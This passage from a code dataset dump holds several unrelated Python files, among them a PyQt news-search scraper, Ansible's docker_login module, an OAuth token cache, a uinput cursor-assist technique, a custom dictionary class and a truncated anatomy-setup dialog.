1:\n self.page -= 10\n self.searchNews()\n\n def closeEvent(self, QCloseEvent):\n self.driver.close()\n\n def searchNews(self):\n if self.sender().text() == \"검색\":\n self.page = 1\n if self.rdSort_0.isChecked():\n sort = \"&sort=0\"\n if self.rdSort_1.isChecked():\n sort = \"&sort=1\"\n if self.rdSort_2.isChecked():\n sort = \"&sort=2\"\n if self.rdType_0.isChecked():\n ntype = \"&photo=0\"\n if self.rdType_1.isChecked():\n ntype = \"&photo=1\"\n if self.rdType_2.isChecked():\n ntype = \"&photo=2\"\n if self.rdType_3.isChecked():\n ntype = \"&photo=3\"\n if self.rdField_0.isChecked():\n feild = \"&field=0\"\n if self.rdField_1.isChecked():\n feild = \"&field=1\"\n\n url = \"https://search.naver.com/search.naver?where=news&query=\" \\\n + 
self.lnKeyword.text() + sort + ntype + feild + \"&start={}\".format(self.page)\n self.driver.get(url)\n print(url)\n self.lst = self.driver.find_elements_by_class_name(\"_sp_each_title\")\n self.apply_lst()\n\n def apply_lst(self):\n self.href.clear()\n self.model.removeRows(0, self.model.rowCount())\n self.model.setRowCount(len(self.lst))\n self.model.setVerticalHeaderLabels(['' for i in range(len(self.lst))])\n for idx, pre in enumerate(self.lst):\n self.model.setData(self.model.index(idx, 0), pre.text)\n self.href.append(pre.get_attribute(\"href\"))\n\n def select(self, e):\n webbrowser.open(self.href[e.row()])\n\n\napp = QApplication([])\nform = Form()\nform.show()\nsys.exit(app.exec_())","sub_path":"PyQT/Naver_News_Pyqt.py","file_name":"Naver_News_Pyqt.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377741033","text":"import os\nimport os.path\nimport re\n\ndef get_config(branch):\n class Config:\n dirname = os.path.join(r\"C:\\Users\\ezhechn\\workspace\\sqrdata\\data\\cppunit\", branch.name, 'logs')\n return Config\n\ndef get_html(config, component, raw, old_raw, rank, old_rank):\n return str(raw)\n\ndef get_rank(config, component, raw):\n success, total = raw\n if total == -1: return 0.0\n\n Y_point = 5.0 if success == total else 1.0\n\n loc = component.line_of_code\n X_point = 1.0\n steps = [(1, 0.1), (loc/200, 0.4), (loc/200+1, 0.6), (loc/100, 0.8), (loc/100+1, 1)]\n for step in steps:\n if total >= step[0]:\n X_point = step[1]\n\n return X_point * Y_point\n\ndef get_latest_filename(filedir):\n files = os.listdir(filedir)\n latest_mtime = -1\n for f in files:\n mtime = os.path.getmtime(os.path.join(filedir, f))\n if mtime > latest_mtime:\n latest_mtime = mtime\n latest_filename = f\n\n return latest_filename\n\ndef get_raw(config, component):\n filename = get_latest_filename(config.dirname)\n filename = os.path.join(config.dirname, filename, \"cppunit\", \"fdsfsc.html\")\n\n#guidriver000000\n#ifdriver575700100 %0\n with open(filename) as f:\n pattern = ']*>(]*>)?%s()?(\\d+)(\\d+)' % component.name\n m = re.search(pattern, f.read())\n total = int(m.group(3))\n success = int(m.group(4))\n return success, total\n\n","sub_path":"src/new_plugins/cppunit.py","file_name":"cppunit.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"212488564","text":"#!/usr/bin/python\n#\n# (c) 2016 Olaf Kilian \n# Chris Houseknecht, \n# James Tanner, \n#\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: docker_login\nshort_description: Log into a Docker registry.\nversion_added: \"2.0\"\ndescription:\n - Provides functionality similar to the \"docker login\" command.\n - Authenticate with a docker registry and add the credentials to your local Docker config file. 
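Note that the credentials are stored in that file base64-encoded, not encrypted. 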
Adding the\n credentials to the config files allows future connections to the registry using tools such as Ansible's Docker\n modules, the Docker CLI and Docker SDK for Python without needing to provide credentials.\n - Running in check mode will perform the authentication without updating the config file.\noptions:\n registry_url:\n description:\n - The registry URL.\n type: str\n default: \"https://index.docker.io/v1/\"\n aliases:\n - registry\n - url\n username:\n description:\n - The username for the registry account.\n - Required when I(state) is C(present).\n type: str\n password:\n description:\n - The plaintext password for the registry account.\n - Required when I(state) is C(present).\n type: str\n email:\n description:\n - \"The email address for the registry account.\"\n type: str\n reauthorize:\n description:\n - Refresh existing authentication found in the configuration file.\n type: bool\n default: no\n aliases:\n - reauth\n config_path:\n description:\n - Custom path to the Docker CLI configuration file.\n type: path\n default: ~/.docker/config.json\n aliases:\n - dockercfg_path\n state:\n version_added: '2.3'\n description:\n - This controls the current state of the user. C(present) will login in a user, C(absent) will log them out.\n - To logout you only need the registry server, which defaults to DockerHub.\n - Before 2.1 you could ONLY log in.\n - Docker does not support 'logout' with a custom config file.\n type: str\n default: 'present'\n choices: ['present', 'absent']\n\nextends_documentation_fragment:\n - docker\n - docker.docker_py_1_documentation\nrequirements:\n - \"L(Docker SDK for Python,https://docker-py.readthedocs.io/en/stable/) >= 1.8.0 (use L(docker-py,https://pypi.org/project/docker-py/) for Python 2.6)\"\n - \"Docker API >= 1.20\"\n - \"Only to be able to logout, that is for I(state) = C(absent): the C(docker) command line utility\"\nauthor:\n - Olaf Kilian (@olsaki) \n - Chris Houseknecht (@chouseknecht)\n'''\n\nEXAMPLES = '''\n\n- name: Log into DockerHub\n docker_login:\n username: docker\n password: rekcod\n\n- name: Log into private registry and force re-authorization\n docker_login:\n registry: your.private.registry.io\n username: yourself\n password: secrets3\n reauthorize: yes\n\n- name: Log into DockerHub using a custom config file\n docker_login:\n username: docker\n password: rekcod\n config_path: /tmp/.mydockercfg\n\n- name: Log out of DockerHub\n docker_login:\n state: absent\n'''\n\nRETURN = '''\nlogin_results:\n description: Results from the login.\n returned: when state='present'\n type: dict\n sample: {\n \"email\": \"testuer@yahoo.com\",\n \"serveraddress\": \"localhost:5000\",\n \"username\": \"testuser\"\n }\n'''\n\nimport base64\nimport json\nimport os\nimport re\nimport traceback\n\ntry:\n from docker.errors import DockerException\nexcept ImportError:\n # missing Docker SDK for Python handled in ansible.module_utils.docker.common\n pass\n\nfrom ansible.module_utils._text import to_bytes, to_text\nfrom ansible.module_utils.docker.common import (\n AnsibleDockerClient,\n DEFAULT_DOCKER_REGISTRY,\n DockerBaseClass,\n EMAIL_REGEX,\n RequestException,\n)\n\n\nclass LoginManager(DockerBaseClass):\n\n def __init__(self, client, results):\n\n super(LoginManager, self).__init__()\n\n self.client = client\n self.results = results\n parameters = self.client.module.params\n self.check_mode = self.client.check_mode\n\n self.registry_url = parameters.get('registry_url')\n self.username = parameters.get('username')\n self.password = 
parameters.get('password')\n self.email = parameters.get('email')\n self.reauthorize = parameters.get('reauthorize')\n self.config_path = parameters.get('config_path')\n\n if parameters['state'] == 'present':\n self.login()\n else:\n self.logout()\n\n def fail(self, msg):\n self.client.fail(msg)\n\n def login(self):\n '''\n Log into the registry with provided username/password. On success update the config\n file with the new authorization.\n\n :return: None\n '''\n\n if self.email and not re.match(EMAIL_REGEX, self.email):\n self.fail(\"Parameter error: the email address appears to be incorrect. Expecting it to match \"\n \"/%s/\" % (EMAIL_REGEX))\n\n self.results['actions'].append(\"Logged into %s\" % (self.registry_url))\n self.log(\"Log into %s with username %s\" % (self.registry_url, self.username))\n try:\n response = self.client.login(\n self.username,\n password=self.password,\n email=self.email,\n registry=self.registry_url,\n reauth=self.reauthorize,\n dockercfg_path=self.config_path\n )\n except Exception as exc:\n self.fail(\"Logging into %s for user %s failed - %s\" % (self.registry_url, self.username, str(exc)))\n\n # If user is already logged in, then response contains password for user\n # This returns correct password if user is logged in and wrong password is given.\n if 'password' in response:\n del response['password']\n self.results['login_result'] = response\n\n if not self.check_mode:\n self.update_config_file()\n\n def logout(self):\n '''\n Log out of the registry. On success update the config file.\n TODO: port to API once docker.py supports this.\n\n :return: None\n '''\n\n cmd = [self.client.module.get_bin_path('docker', True), \"logout\", self.registry_url]\n # TODO: docker does not support config file in logout, restore this when they do\n # if self.config_path and self.config_file_exists(self.config_path):\n # cmd.extend([\"--config\", self.config_path])\n\n (rc, out, err) = self.client.module.run_command(cmd)\n if rc != 0:\n self.fail(\"Could not log out: %s\" % err)\n if 'Not logged in to ' in out:\n self.results['changed'] = False\n elif 'Removing login credentials for ' in out:\n self.results['changed'] = True\n else:\n self.client.module.warn('Unable to determine whether logout was successful.')\n\n # Adding output to actions, so that user can inspect what was actually returned\n self.results['actions'].append(to_text(out))\n\n def config_file_exists(self, path):\n if os.path.exists(path):\n self.log(\"Configuration file %s exists\" % (path))\n return True\n self.log(\"Configuration file %s not found.\" % (path))\n return False\n\n def create_config_file(self, path):\n '''\n Create a config file with a JSON blob containing an auths key.\n\n :return: None\n '''\n\n self.log(\"Creating docker config file %s\" % (path))\n config_path_dir = os.path.dirname(path)\n if not os.path.exists(config_path_dir):\n try:\n os.makedirs(config_path_dir)\n except Exception as exc:\n self.fail(\"Error: failed to create %s - %s\" % (config_path_dir, str(exc)))\n self.write_config(path, dict(auths=dict()))\n\n def write_config(self, path, config):\n try:\n with open(path, \"w\") as file:\n json.dump(config, file, indent=5, sort_keys=True)\n except Exception as exc:\n self.fail(\"Error: failed to write config to %s - %s\" % (path, str(exc)))\n\n def update_config_file(self):\n '''\n If the authorization not stored in the config file or reauthorize is True,\n update the config file with the new authorization.\n\n :return: None\n '''\n\n path = self.config_path\n if not 
self.config_file_exists(path):\n self.create_config_file(path)\n\n try:\n # read the existing config\n with open(path, \"r\") as file:\n config = json.load(file)\n except ValueError:\n self.log(\"Error reading config from %s\" % (path))\n config = dict()\n\n if not config.get('auths'):\n self.log(\"Adding auths dict to config.\")\n config['auths'] = dict()\n\n if not config['auths'].get(self.registry_url):\n self.log(\"Adding registry_url %s to auths.\" % (self.registry_url))\n config['auths'][self.registry_url] = dict()\n\n b64auth = base64.b64encode(\n to_bytes(self.username) + b':' + to_bytes(self.password)\n )\n auth = to_text(b64auth)\n\n encoded_credentials = dict(\n auth=auth,\n email=self.email\n )\n\n if config['auths'][self.registry_url] != encoded_credentials or self.reauthorize:\n # Update the config file with the new authorization\n config['auths'][self.registry_url] = encoded_credentials\n self.log(\"Updating config file %s with new authorization for %s\" % (path, self.registry_url))\n self.results['actions'].append(\"Updated config file %s with new authorization for %s\" % (\n path, self.registry_url))\n self.results['changed'] = True\n self.write_config(path, config)\n\n\ndef main():\n\n argument_spec = dict(\n registry_url=dict(type='str', default=DEFAULT_DOCKER_REGISTRY, aliases=['registry', 'url']),\n username=dict(type='str'),\n password=dict(type='str', no_log=True),\n email=dict(type='str'),\n reauthorize=dict(type='bool', default=False, aliases=['reauth']),\n state=dict(type='str', default='present', choices=['present', 'absent']),\n config_path=dict(type='path', default='~/.docker/config.json', aliases=['dockercfg_path']),\n )\n\n required_if = [\n ('state', 'present', ['username', 'password']),\n ]\n\n client = AnsibleDockerClient(\n argument_spec=argument_spec,\n supports_check_mode=True,\n required_if=required_if,\n min_docker_api_version='1.20',\n )\n\n try:\n results = dict(\n changed=False,\n actions=[],\n login_result={}\n )\n\n LoginManager(client, results)\n if 'actions' in results:\n del results['actions']\n client.module.exit_json(**results)\n except DockerException as e:\n client.fail('An unexpected docker error occurred: {0}'.format(e), exception=traceback.format_exc())\n except RequestException as e:\n client.fail('An unexpected requests error occurred when docker-py tried to talk to the docker daemon: {0}'.format(e), exception=traceback.format_exc())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/docker/docker_login.py","file_name":"docker_login.py","file_ext":"py","file_size_in_byte":11588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632520164","text":"import json\nfrom nullroute.core import Core, Env\nimport nullroute.sec\nimport os\n\nclass OAuthTokenCache(object):\n TOKEN_SCHEMA = \"org.eu.nullroute.OAuthToken\"\n\n def __init__(self, domain, display_name=None):\n self.domain = domain\n self.display_name = display_name or domain\n self.token_path = Env.find_cache_file(\"token_%s.json\" % domain)\n\n def _store_token_libsecret(self, data):\n nullroute.sec.store_libsecret(\"OAuth token for %s\" % self.display_name,\n json.dumps(data),\n {\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n\n def _load_token_libsecret(self):\n data = nullroute.sec.get_libsecret({\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n return json.loads(data)\n\n def _clear_token_libsecret(self):\n 
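# drop the libsecret entry matching this token's schema and domain attributes
        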
nullroute.sec.clear_libsecret({\"xdg:schema\": self.TOKEN_SCHEMA,\n \"domain\": self.domain})\n\n def _store_token_file(self, data):\n with open(self.token_path, \"w\") as fh:\n json.dump(data, fh)\n\n def _load_token_file(self):\n with open(self.token_path, \"r\") as fh:\n data = fh.read()\n return json.loads(data)\n\n def _clear_token_file(self):\n try:\n os.unlink(self.token_path)\n except FileNotFoundError:\n pass\n\n def load_token(self):\n Core.debug(\"loading OAuth token for %r\", self.domain)\n try:\n return self._load_token_libsecret()\n except KeyError:\n try:\n return self._load_token_file()\n except FileNotFoundError:\n pass\n except Exception as e:\n Core.debug(\"could not load %r: %r\", self.token_path, e)\n self.forget_token()\n return None\n\n def store_token(self, data):\n Core.debug(\"storing OAuth token for %r\", self.domain)\n self._store_token_libsecret(data)\n try:\n self._store_token_file(data)\n except Exception as e:\n Core.warn(\"could not write %r: %r\", self.token_path, e)\n\n def forget_token(self):\n Core.debug(\"flushing OAuth tokens for %r\", self.domain)\n self._clear_token_libsecret()\n self._clear_token_file()\n\n","sub_path":"lib/python/nullroute/sec/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383941736","text":"import math\nimport time\n\nfrom PyQt5 import QtWidgets\nfrom evdev import UInput, ecodes as e\n\n\"\"\"\nOur pointing technique supports users by moving the cursor to the target when it is near the target.\nIt seems as if the target is magnetic. In fact, we use linear interpolation to move the mouse to the target.\nThe following sources have been consulted for the implementation:\n - https://en.wikipedia.org/wiki/Linear_interpolation\n - https://stackoverflow.com/questions/49173095/how-to-move-an-object-along-a-line-given-two-points#49173439\n\nUpon initialization of the method, the target, a threshold value at which the indentation should start\nand the number of interpolation steps are transmitted.\nFor positioning the mouse UInput was used (see https://python-evdev.readthedocs.io/en/latest/usage.html and\nhttps://www.kernel.org/doc/html/v4.12/input/uinput.html).\n\nThe new pointing technique is executed when it is enabled in the config file and the mouse is moved.\nThe filter method used for this gets the current position of the mouse and moves the pointer to the\ntarget once the distance to the target is below the threshold.\n\nAs the user clicks at the target, the device closes to prevent the cursor from moving.\n\"\"\"\n\n\n# Author: Sarah\n# Reviewer: Claudia\nclass PointingTechnique:\n capabilities = {\n e.EV_REL: (e.REL_X, e.REL_Y),\n e.EV_KEY: (e.BTN_LEFT, e.BTN_RIGHT)\n }\n\n def __get_distance_to_target(self, pos):\n return math.dist([pos.x(), pos.y()], [self.__target_pos.x(), self.__target_pos.y()])\n\n def __is_in_target(self, pos):\n return self.__get_distance_to_target(pos) <= (self.__target.width() / 2)\n\n # Code based on:\n # https://en.wikipedia.org/wiki/Linear_interpolation\n # https://stackoverflow.com/questions/49173095/how-to-move-an-object-along-a-line-given-two-points#49173439\n def __move_to_target(self):\n if self.__moving or self.__is_in_target(self.__current_pos):\n return\n\n self.__moving = True\n\n n = self.__density # The smaller n is the \"faster\" the mouse becomes\n x0, y0 = self.__current_pos.x(), self.__current_pos.y()\n x1, y1 = self.__target_pos.x(), self.__target_pos.y()\n 
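# linear interpolation: p(t) = (1 - t) * p0 + t * p1 for t in [0, 1);
        # the previous point is tracked so each step emits relative deltas
        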
x_t0, y_t0 = x0, y0\n\n        for i in range(0, n):\n            if self.__is_in_target(self.__current_pos):\n                return\n\n            t = i / n\n            x_t = (1.0 - t) * x0 + t * x1\n            y_t = (1.0 - t) * y0 + t * y1\n\n            rel_x = int(x_t - x_t0)\n            rel_y = int(y_t - y_t0)\n\n            self.__device.write(e.EV_REL, e.REL_X, rel_x)\n            self.__device.write(e.EV_REL, e.REL_Y, rel_y)\n            self.__device.syn()\n\n            x_t0, y_t0 = x_t, y_t\n\n            time.sleep(0.01)\n            QtWidgets.qApp.processEvents()\n\n        self.__moving = False\n\n    def __init__(self, target, threshold, density):\n        self.__moving = False\n        self.__device = UInput(self.capabilities)\n        self.__target = target\n        self.__target_pos = self.__target.geometry().center()\n        self.__current_pos = None\n\n        self.__threshold = threshold\n        self.__density = density\n\n    def __del__(self):\n        self.__device.close()\n\n    def filter(self, current_pos):\n        self.__current_pos = current_pos\n\n        threshold = int(self.__target.parent().width() * self.__threshold)\n        if self.__get_distance_to_target(current_pos) < threshold:\n            self.__move_to_target()\n","sub_path":"pointing_technique.py","file_name":"pointing_technique.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"511104537","text":"from classLista import ListaLigada\nfrom classSuperLista import *\n\n\n\nclass Nodo_2: #formerly reina (queen)\n\n    def __init__(self, key, value):\n        self.key = key\n        self.value = value\n\n    def copy(self):\n        copy = Nodo_2(self.key, self.value)\n        return copy\n\n    def __repr__(self):\n        return self.key\n\nclass Dict: #formerly colonia (colony)\n\n    def __init__(self):\n        self.nodos = Lista()\n\n    def __setitem__(self, key, value):\n        #Sets the value of the element corresponding to key\n        in_list = False\n        for nodo in self.nodos:\n            if nodo.key == key:\n                nodo.value = value\n                in_list = True\n                break\n        if not in_list:\n            self.append(key, value)\n            nodo = key\n        return nodo\n\n    def __getitem__(self, key):\n        #Returns the element corresponding to key\n        for nodo in self.nodos:\n            if nodo.key == key:\n                return nodo.value\n        raise IndexError(\"Key not found\")\n\n\n    def __add__(self, valor):\n        #Adds the Dict valor to self\n        suma = Dict()\n        for nodo in self:\n            suma.append(nodo)\n        for nodo in valor:\n            suma.append(nodo)\n        return suma\n\n    def __len__(self):\n        #Returns the number of entries in self\n        return len(self.nodos)\n\n    def __iter__(self):\n        #Allows iterating with a for loop\n        return Iterador(self.nodos.cabeza)\n\n    def __repr__(self):\n        rep = '{'\n        check = False\n        for nodo in self.nodos:\n            check = True\n            rep += '{0}: {1}, '.format(nodo.key, nodo.value)\n        if check:\n            rep = rep[:-2]\n        rep += '}'\n        return rep\n\n    def append(self, nodo_2, value = None):\n        #Appends a node with the given value\n        elem = Nodo_2(nodo_2, value)\n        self.nodos.append(elem)\n\n    def __delitem__(self, key):\n        #Removes key and its value from self\n        check = False\n        for nodo in self.nodos:\n            if nodo.key == key:\n                check = True\n                break\n        if check:\n            p = self.nodos.find(nodo)\n            new = Lista()\n            for r in range(len(self.nodos)):\n                if r != p:\n                    new.append(self.nodos[r])\n            self.nodos = new\n        else:\n            raise IndexError(\"Position not found.\")\n\n    def copy(self):\n        #Returns a copy of self\n        copia = Dict()\n        for nodo in self.nodos:\n            copia.append(nodo.key, nodo.value)\n        return copia\n\n    def keys(self):\n        lista = Lista()\n        for elemento in self:\n            lista.append(elemento)\n        return lista\n\n    def values(self):\n        lista = Lista()\n        for elemento in self:\n            lista.append(self[elemento])\n        return lista\n\n    def items(self):\n        lista = Lista()\n        for elemento in self:\n            lista_2 = Lista()\n            lista.append(lista_2)\n            lista_2.append(str(elemento))\n            lista_2.append(self[elemento])\n\n        return lista\n\n\nclass Iterador:\n\n    def __init__(self, iterable):\n        self.iterable = iterable\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self.iterable is None:\n            raise StopIteration(\"Reached the end\")\n        else:\n            to_return = self.iterable.valor\n            self.iterable = self.iterable.siguiente\n            return to_return\n","sub_path":"AVANZADA/T02/TAREA 2 testing codes/classDict.py","file_name":"classDict.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563746523","text":"class Solution:\n    def smallestRepunitDivByK(self, K: int) -> int:\n        if K & 1 == 0:\n            return -1\n        NL = 1\n        N = 1\n        remainSet = set()\n        while True:\n            remain = N % K\n            if remain == 0:\n                return NL\n            if remain in remainSet:\n                break\n            remainSet.add(remain)\n            NL += 1\n            N = N * 10 + 1\n        return -1\n\n\nsol = Solution()\nret = sol.smallestRepunitDivByK(2) # -1\nret = sol.smallestRepunitDivByK(3) # 3\nprint(ret)","sub_path":"src/smallest-integer-divisible-by-k.py","file_name":"smallest-integer-divisible-by-k.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259343670","text":"\"\"\"\nForward model and anatomy setup dialog.\n\nExposed classes\n---------------\nFwdSetupDialog: QDialog\n    Dialog window which sets up subject, subjects_dir and forward model path\n\n\"\"\"\nimport os\nimport os.path as op\nimport inspect\nimport json\nimport shutil\nimport numpy as np\nimport logging\n\nimport mne\nfrom PyQt5.QtWidgets import (\n    QDialog,\n    QHBoxLayout,\n    QLabel,\n    QComboBox,\n    QDialogButtonBox,\n    QPushButton,\n    QFileDialog,\n    QRadioButton,\n    QGroupBox,\n    QVBoxLayout,\n    QLineEdit,\n    QWidget,\n    QDoubleSpinBox,\n    QMessageBox,\n    QMainWindow,\n    QCheckBox,\n    QGridLayout,\n)\n\nfrom PyQt5.Qt import QSizePolicy, QTimer\nfrom PyQt5.QtCore import Qt, pyqtSignal, QSignalBlocker\nfrom cognigraph import COGNIGRAPH_DATA, MONTAGES_DIR\nfrom cognigraph.gui.async_pipeline_update import ThreadToBeWaitedFor\nfrom cognigraph.utils.io import download_anatomy_and_forwards\nfrom .montage_editor import MontageEditor\n\n\nclass _ResettableComboBox(QComboBox):\n    \"\"\"\n    Combobox with capability of setting all items\n    anew and retrieving items as list.\n\n    \"\"\"\n\n    def __init__(self, *pargs, **kwargs):\n        QComboBox.__init__(self, *pargs, **kwargs)\n\n    def setItems(self, items):\n        block_signals = QSignalBlocker(self)  # noqa\n        for i in range(self.count()):\n            self.removeItem(0)\n        self.addItems(items)\n\n    def getItems(self):\n        return [self.itemText(i) for i in range(self.count())]\n\n\nclass _PathSelectorWidget(QWidget):\n    \"\"\"QLineEdit + QPushButton connected to QFileDialog to set path\"\"\"\n\n    def __init__(self, dialog_caption, path=\"\", parent=None):\n        QWidget.__init__(self, parent)\n        self._path = None\n\n        layout = QHBoxLayout()\n        self.path_ledit = QLineEdit(path, readOnly=True)\n        # Set up a minimum lineedit width so the path fits in\n        fm = self.path_ledit.fontMetrics()\n        min_lineedit_width = fm.boundingRect(COGNIGRAPH_DATA).width()\n        self.path_ledit.setMinimumWidth(min_lineedit_width)\n        self.path_ledit.setToolTip(self.path_ledit.text())\n        self.path_ledit.textChanged.connect(self._set_lineedit_tooltip)\n        self.browse_button = QPushButton(\"Browse\")\n        self.browse_button.setDefault(False)\n        
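# not the dialog default; Enter activates it only while it has focus
        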
self.browse_button.setAutoDefault(True)\n self.browse_button.clicked.connect(self._on_browse_clicked)\n layout.addWidget(self.path_ledit)\n layout.addWidget(self.browse_button)\n self.setLayout(layout)\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self._file_dialog = QFileDialog(\n caption=dialog_caption, directory=self.path_ledit.text()\n )\n\n def _set_lineedit_tooltip(self):\n self.path_ledit.setToolTip(self.path_ledit.text())\n\n def _on_browse_clicked(self):\n raise NotImplementedError\n\n @property\n def path(self):\n \"\"\"Path to folder or file selected in popup window\"\"\"\n return self._path\n\n @path.setter\n def path(self, value):\n self._path = value\n if value:\n self.path_ledit.setText(value)\n\n\nclass _FolderSelectorWidget(_PathSelectorWidget):\n \"\"\"\n QLineEdit + QPushButton connected to QFileDialog to set path to FOLDER\n\n \"\"\"\n\n def _on_browse_clicked(self):\n folder_path = self._file_dialog.getExistingDirectory()\n self.path = folder_path\n\n\nclass _FileSelectorWidget(_PathSelectorWidget):\n \"\"\"\n QLineEdit + QPushButton connected to QFileDialog to set path to FILE\n\n \"\"\"\n\n def __init__(self, dialog_caption, file_filter, path=\"\", parent=None):\n _PathSelectorWidget.__init__(self, dialog_caption, path, parent)\n self.filter = file_filter\n\n def _on_browse_clicked(self):\n file_path = self._file_dialog.getOpenFileName(filter=self.filter)[0]\n self.path = file_path\n\n\nclass _StateAwareGroupbox(QGroupBox):\n \"\"\"\n QGroupBox tracking valid-invalid and active-inactive state\n and emitting a signal when these states change.\n\n \"\"\"\n\n state_changed = pyqtSignal()\n\n def __init__(self, *pargs, **kwargs):\n QGroupBox.__init__(self, *pargs, **kwargs)\n self._is_valid = True\n self._is_active = True\n\n @property\n def is_valid(self):\n \"\"\"Represents validity of all input parameters\"\"\"\n return self._is_valid\n\n @is_valid.setter\n def is_valid(self, value):\n before = self.is_good\n self._is_valid = value\n after = self.is_good\n if before != after:\n self.state_changed.emit()\n\n @property\n def is_active(self):\n \"\"\"Represents disabled-enabled state of the groupbox\"\"\"\n return self._is_active\n\n @is_active.setter\n def is_active(self, value):\n before = self.is_good\n if value:\n self.show()\n else:\n self.hide()\n self._is_active = value\n after = self.is_good\n if before != after:\n self.state_changed.emit()\n\n @property\n def is_good(self):\n if self.is_active:\n return self.is_valid\n else:\n return True\n\n\nclass _FwdOptionsRadioButtons(QGroupBox):\n \"\"\"Groupbox with three radio buttons\"\"\"\n\n def __init__(self, title=\"Forward model\", parent=None):\n QGroupBox.__init__(self, title=title, parent=parent)\n\n self.use_default_fwd_radio = QRadioButton(\"&Use available forward\")\n self.use_default_fwd_radio.setChecked(True)\n\n self.compute_fwd_radio = QRadioButton(\"&Compute forward\")\n\n self.import_fwd_radio = QRadioButton(\"&Import forward\")\n\n forward_radio_layout = QVBoxLayout()\n forward_radio_layout.addWidget(self.use_default_fwd_radio)\n forward_radio_layout.addWidget(self.compute_fwd_radio)\n forward_radio_layout.addWidget(self.import_fwd_radio)\n\n self.setLayout(forward_radio_layout)\n\n\nclass _AnatGroupbox(_StateAwareGroupbox):\n \"\"\"Groupbox to setup subjects_dir and subject\"\"\"\n\n def __init__(\n self,\n title=\"Anatomy\",\n default_subj_dir=op.join(COGNIGRAPH_DATA, \"anatomy\"),\n default_subj=\"fsaverage\",\n subjects_dir=None,\n subject=None,\n parent=None,\n ):\n 
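# keep the defaults so the use-available toggle can restore them later
        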
_StateAwareGroupbox.__init__(self, parent, title=title)\n self.default_subj_dir = default_subj_dir\n self.default_subj = default_subj\n self.subjects_dir = subjects_dir or self.default_subj_dir\n self.subject = subject or self.default_subj\n self.subjects = self._get_fsf_subjects(self.subjects_dir)\n # ------------------ anatomy gpbox ------------------ #\n self._use_avail_anat_radio = QRadioButton(\"&Use available anatomy\")\n self._use_avail_anat_radio.setChecked(True)\n self._use_avail_anat_radio.toggled.connect(self._on_toggled)\n self.import_anat_radio = QRadioButton(\"&Import anatomy\")\n self.import_anat_radio.setChecked(False)\n\n self.subject_combobox = _ResettableComboBox()\n self.subject_combobox.addItems(self.subjects)\n self.subject_combobox.setCurrentText(self.subject)\n subject_label = QLabel(\"Subject:\")\n subject_layout = QHBoxLayout()\n subject_layout.addWidget(subject_label)\n subject_layout.addWidget(self.subject_combobox)\n\n self.subjects_dir_widget = _FolderSelectorWidget(\n \"Select subjects directory\", path=self.subjects_dir\n )\n\n subjects_dir_subject_layout = QVBoxLayout()\n subjects_dir_subject_layout.addWidget(self.subjects_dir_widget)\n subjects_dir_subject_layout.addLayout(subject_layout)\n\n self.subjects_dir_widget.path_ledit.textChanged.connect(\n self._on_anat_path_changed\n )\n\n self.subject_combobox.currentTextChanged.connect(\n self._on_subject_combo_changed\n )\n\n self.anat_path_widget = QWidget()\n self.anat_path_widget.setLayout(subjects_dir_subject_layout)\n self.anat_path_widget.setSizePolicy(\n QSizePolicy.Minimum, QSizePolicy.Fixed\n )\n self.subjects_dir_widget.setDisabled(True)\n\n anat_gbox_layout = QVBoxLayout()\n anat_gbox_layout.addWidget(self._use_avail_anat_radio)\n anat_gbox_layout.addWidget(self.import_anat_radio)\n anat_gbox_layout.addWidget(self.anat_path_widget)\n\n self.setLayout(anat_gbox_layout)\n # ------------------------------------------------------ #\n\n def _on_toggled(self):\n if self._use_avail_anat_radio.isChecked():\n self.subjects_dir_widget.setDisabled(True)\n if self.subjects_dir != self.default_subj_dir:\n self.subjects_dir_widget.path_ledit.setText(\n self.default_subj_dir\n )\n self.is_valid = True\n else:\n if self.subjects_dir and self.subject:\n self.is_valid = True\n else:\n self.is_valid = False\n self.subjects_dir_widget.setDisabled(False)\n self.subjects_dir_widget.browse_button.setFocus()\n\n def _get_fsf_subjects(self, path):\n files = os.listdir(path)\n if not files:\n ans = QMessageBox.question(\n self,\n \"Default anatomy folder is empty\",\n \"Default anatomy is missing. 
